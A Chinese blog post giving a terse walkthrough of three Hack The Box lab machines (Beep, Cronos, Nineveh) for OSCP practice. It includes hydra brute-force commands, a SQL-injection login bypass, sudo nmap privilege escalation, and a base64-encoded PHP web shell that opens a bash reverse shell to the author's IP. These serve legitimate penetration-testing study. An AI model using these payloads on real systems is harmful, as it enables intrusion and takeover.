废物的靶场日记 htb-oscp-beep+cronos+nineveh

最新推荐文章于 2024-06-16 13:15:43 发布
最新推荐文章于 2024-06-16 13:15:43 发布
阅读量1.3k 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53302733/article/details/123835334
版权

HTB-oscplike-beep+cronos+nineveh

Beep

easy难度的beep 靶机IP10.10.10.7

sudo nmap -sC -sV -A --min-rate=5000 -p- -Pn 10.10.10.7
访问80后发现是一个elastix searchsploit搜到php/webapps/18650.py
修改参数后发现有一个extension需要修改但是不知道是什么勾八
google elastix extension后发现是sip extension
用svwar可以找到svwar -e100-900 10.10.10.7 -m invite 找到是233 用exp弹nc
拿到user的flag b870414fcf136f5caf96e4c08042510f

同时发现/home下面有个spamfilter没法进去
/etc/passwd看到一样的用户 spamfilter❌500:500::/home/spamfilter:/bin/bash

sudo -l看见包括touch很多都可以执行 但是文件系统是只读的所以行不通

但是有(root) NOPASSWD: /usr/bin/nmap 直接 sudo nmap --interactive提权打完
e7afffe6c966e1157804e05d99cd2ee0
请添加图片描述

Cronos

medium难度的cronos 靶机IP 10.10.10.13

sudo nmap -sC -sV -A --min-rate=5000 -p- -Pn 10.10.10.13
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

80打开是一个配置默认页面 dirsearch一下没啥东西 wfuzz出子域名admin.cronos.htb
发现是一个登录界面扫后台没扫出东西 其他地方也没角度 要么爆破要么sql注入了 admin’ or ‘1’='1 --+ 进去 后台里面有个PING 可以命令执行
请添加图片描述

那么就弹nc吧 弹回来拿到user的flag 51d236438b333970dbba7dc3089be33b

find / -perm -u=s -type f 2>/dev/null
看到pkexec 但是我已经痛改前非不用它了 什么勾八cve 爷将会凭着头脑破案
上传linpeas扫一下 什么内核提权通通不看 看到

          •   root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

定时任务嘛这不是 哥几个今天给他上一课 这里vi会很恶心 nano artisan进去改成phpshell
弹root过来 拿下flag
1703b8a3c9a8dde879942c79d02fd3a0
请添加图片描述

Nineveh

medium难度的nineveh 靶机IP 10.10.10.43

sudo nmap -sV -A -sC -p- --min-rate=5000 10.10.10.43 -Pn
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))

wfuzz+dirsearch先扫https 扫到https://nineveh.htb/db/
可以登录同时版本是phpLiteAdmin v1.9

hydra -l true -P fasttrack.txt 10.10.10.43 https-post-form “/db/index.php:password=PASS&login=Log+In&proc_login=USER:Incorrect”

拿一个小一点的词典爆破就行 login: true password: password123 登录然后参照searchsploit找到的exp操作发现是不行的 权限不够
它把我们写入的php文件移动到了/var/tmp下 此路不通

那么我们回头去扫http://10.10.10.43/ 发现了/department
访问发现另一个登陆网站好像没有sql 又是爆破

hydra嗯跑 密码1q2w3e4r5t 进去看到
Have you fixed the login page yet! hardcoded username and password is really bad idea!
check your serect folder to get in! figure it out! this is your challenge
Improve the db interface.
~amrois
什么勾八 不管它 看到参数http://10.10.10.43/department/manage.php?notes=files/ninevehNotes.txt

这不LFI吗 那么能不能直接配合我们刚才传的php呢 答案是不行的
这边测试半天发现文件名必须包含ninevehNotes才能读

那么能不能把我们的php改名成ninevehnotes.php呢 是可以的
但是这里有个问题就是因为是根据sql来创建表 我们的payload里是不能出现单引号之类的一些字符 不然会报错

<?php system("echo -n YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjUvNzg4OCAwPiYx| base64 -d | bash")?>

省点事 直接base64绕过 上线nc 但是没权限拿到user的flag

提权逛了一圈 pspy之后发现一直在执行/bin/sh /usr/bin/chkrootkit

searchsploit看到了漏洞 在执行chkrootkit时会调用/tmp/update 所以我们写个有毒的update就行 拿下root权限
最后两个flag一起拿 打完
78f4a59aaacce4fc506ef8ace5ba1c5f
5b3e377b0546ed0f06deaee0c26005cb

请添加图片描述

ore0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HTB靶场系列 linux靶机 Beep靶机
m0_57221101的博客
01-15 1240
这个靶场真的很厉害,学到了非常多的东西 需要学习的技能 nmap扫描具体端口 -sC -sV -p 223 searchspoilt 打开文件 -x sslscan ip 探测目标机器 ssl版本 勘探 首先还是一样用nmap大致扫描,再用nmap对扫出的端口进行细致扫描 nmap nmapshows a bunch of ports open on the box: root@kali# nmap -sT -p- --min-rate 5000 -oA nmap/alltcp 10..
大余安全-项目五
weixin_45895231的博客
09-19 1370
渗透测试基础
最新Apache漏洞分析
二狗的博客
12-30 2064
2021年9月16日,Apache官方发布了Apache httpd mod_proxy SSRF漏洞CVE-2021-40438,影响v2.4.48及以下版本。该漏洞影响范围较广,危害较大,利用简单,不得不引起重视。该ssrf代理访问漏洞适用于apache的绝大多是版本,相对来说漏洞原理比较简单,隐藏了多年也是很不容易了,至于危害的话,笔者认为危害还是挺大的,可以访问到服务器内部一些不对外开放的http端口及uds文件。
一文带你了解OSCP 2024
最新发布
白帽黑客佳哥的博客
06-16 2450
我们先说说,OSCP 是什么?OSCP (Offensive Security Certified Professional)是 Offensive Security (该公司开发和维护着 KALI Linux,以下简称 Offsec)推出的体系非常完善,对于非3年以上渗透工作经验人员来说难度非常高,理论兼实操(更重实操),是业界最知名的渗透测试专业证书。如果大家对网络、主机渗透、红队感兴趣的,这是大家的第一步。考试有三台单独考试靶机和一套域环境(三台机器)三台单独机器,每台20分;
oscp——HTB——Optimum
王嘟嘟的博客
05-25 524
0x00 前言 难度 入门1级 0x01 信息收集 0x02 Web——Webshell 访问一下目标站点,看到是HFS 搜一下payload 发现可以直接使用msf打过去 拿到shell之后就可以拿到user的flag 这里我用cs又建立了一个稳定的连接 0x03 Webshell——Rootshell 首先systeminfo获取一下信息,然后使用Windows-Exploit-Suggester进行扫描 使用MS16-098进行提权 ...
关于kali的一些小工具
weixin_43570648的博客
12-11 1699
基于端口攻击的攻击 基于smb的攻击 1.acccheck acccheck -t 192.168.1.1 -u root -p root -v //基础语法 参数: -t/T 目标地址/批量字典 -p/P 密码/密码字典 -u/U 账号/账号字典 2.smbmap(smb信息收集器) smbmap -H 192.168.1.1 //收集smb共享的信息 smbmap -H 192.168.1.1 -u anonymous //匿名登录 smbm
shaper-scripts:示例防火墙 + HTB + IMQ
05-29
信息 ifconfig eth0: flags=4163<UP> mtu 1500 inet 192.168.120.160 网络掩码 255.255.255.0 广播 192.168.120.255 inet6:80:40ffab0c0c 前缀:80:40ffab0c00c 前缀:280:4000c0c e8:fa:b3 txqueuelen 1000 ...
ROS3.30 +HTB+DSCP-L7
10-11
ROS3.30 +HTB+DSCP-L7
HTB-writeups:此仓库包含HackTheBox的文章
05-01
【标题】"HTB-writeups:此仓库包含HackTheBox的文章" 这个标题表明这是一个与网络安全相关的资源库,特别是关于HackTheBox(HTB)的挑战和机器的解决过程记录。HackTheBox是一个在线平台,允许安全专家和爱好者通过...
谷歌师兄的leetcode刷题笔记-OSCP-Prep:OSCP准备
06-30
谷歌师兄的leetcode刷题笔记OSCP-准备 PWK 课程大纲 OSCP 喜欢 VulnHub 游戏 Linux 和 Bash Linux 之旅 - Bash 初学者 - 解释壳—— 基本工具 Netcat:整个课程中最重要的工具。 了解它的作用、您有哪些选项、反向 ...
E8-DSCP+L7+HTB实现网页、网页视频、迅雷下载
11-10
E8-DSCP+L7+HTB实现网页、网页视频、迅雷下载
HTB靶机08-Nineveh-WP
灰蜗牛
05-08 684
HTB靶机08-Nineveh-WP 总体思路:端口扫描、Web扫描、弱口令爆破、漏洞利用,信息搜集,knock程序、SSH,chkrootkit
废物靶场日记 htb-oscp-nibbles
m0_53302733的博客
03-28 920
废物靶场日记 htb-oscp-nibbles 简单的就不分割了 sudo nmap -sV -A -sC --min-rate=5000 -p- 10.10.10.75 -Pn 经典22 80 22/tcp open tcpwrapped 80/tcp open tcpwrapped 访问发现只有一句hello world!其他啥也没 纯纯的ctf了属于是 F12看到 /nibbleblog/ directory. Nothing interesting here! 进去看到一个网站 searc
OSCP - vulnhub BILLY MADISON: 1.1 靶机测试
m0_55751267的博客
08-12 1059
BILLY MADISON: 1.1 靶机测试
HTB靶场系列 linux靶机 Nineveh靶机
m0_57221101的博客
01-17 4444
勘探 nmap勘探 nmap -sC -sV 10.10.10.43 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-26 16:22 CST Nmap scan report for 10.10.10.43 Host is up (0.36s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http
OSCP推荐靶场-FristiLeaks
qq_63785498的博客
10-06 447
SetUID(Set User ID)是一种特殊的权限,它允许一个程序在执行时以文件所有者的身份运行,而不是执行者的身份。这样做的效果是,命令的标准输入会与网络套接字的输出连接,从而允许远程计算机发送命令到被攻击者的计算机。: 这个选项指定了发送扫描请求的最小速率,即在扫描中发送数据包的最小速度。: 这是一个I/O重定向操作符,它将一个文件描述符(在这里是标准输出)连接到另一个文件描述符。: 这是Shell程序的名称,它会启动一个新的Shell会话。: 这是Linux系统上的一个用于查找文件和目录的命令。
靶场实战(12):OSCP备考之VulnHub SEPPUKU
OneMoreThink
01-09 1060
打靶思路资产发现主机发现服务发现(端口、服务、组件、版本)漏洞发现(获取权限)21端口/FTP服务组件漏洞口令漏洞80端口/HTTP服务组件漏洞URL漏洞(目录、文件)7080端口/HTTPS服务组件漏洞URL漏洞(目录、文件)7601端口/HTTP服务组件漏洞URL漏洞(目录、文件)提升权限seppuku用户sudosuidcron内核提权信息收集samurai用户sudosuidcron内核提...
OSCP 2021攻略之旅--从小白到通过
热门推荐
ShadowBlade
08-08 2万+
发布此文章,能够让更多想学习通过OSCP的同学得到更好的指导。
DC3通关教程
qq_49176777的博客
12-22 1995
先利用nmap -A IP 收集信息 ─# nmap -A 192.168.232.129 Starting Nmap 7.92 ( Nmap: the Network Mapper - Free Security Scanner ) at 2021-12-21 21:22 CST Nmap scan report for 192.168.232.129 Host is up (0.00021s latency). Not shown: 999 closed tcp ports (reset)
cozyhosting+htb
09-20
CSDN AI助手(C知道):对于你提到的 "cozyhosting htb",我理解的是你在提及CTF平台Hack The Box中的CozyHosting机器。CozyHosting是一个涉及Web应用安全的挑战。你可能需要在Hack The Box平台上登录并进行相关操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值